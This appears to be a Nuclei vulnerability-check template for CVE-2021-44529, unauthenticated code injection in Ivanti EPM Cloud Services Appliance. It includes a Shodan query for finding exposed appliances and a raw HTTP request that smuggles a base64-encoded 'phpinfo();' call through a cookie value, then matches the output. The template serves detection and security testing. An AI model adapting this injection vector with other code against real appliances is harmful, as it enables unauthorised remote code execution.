46 lines
1.5 KiB
YAML
46 lines
1.5 KiB
YAML
id: CVE-2021-44529
|
|
|
|
info:
|
|
name: Ivanti EPM Cloud Services Appliance Code Injection
|
|
author: duty_1g,phyr3wall,Tirtha
|
|
severity: critical
|
|
description: Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).
|
|
reference:
|
|
- https://forums.ivanti.com/s/article/SA-2021-12-02
|
|
- https://twitter.com/Dinosn/status/1505273954478530569
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-44529
|
|
- http://packetstormsecurity.com/files/166383/Ivanti-Endpoint-Manager-CSA-4.5-4.6-Remote-Code-Execution.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-44529
|
|
cwe-id: CWE-94
|
|
epss-score: 0.96445
|
|
cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: title:"LANDesk(R) Cloud Services Appliance"
|
|
vendor: ivanti
|
|
product: endpoint_manager_cloud_services_appliance
|
|
tags: cve2021,ivanti,epm,csa,injection,packetstorm,cve
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /client/index.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "phpinfo()"
|
|
- "Cloud Services Appliance"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|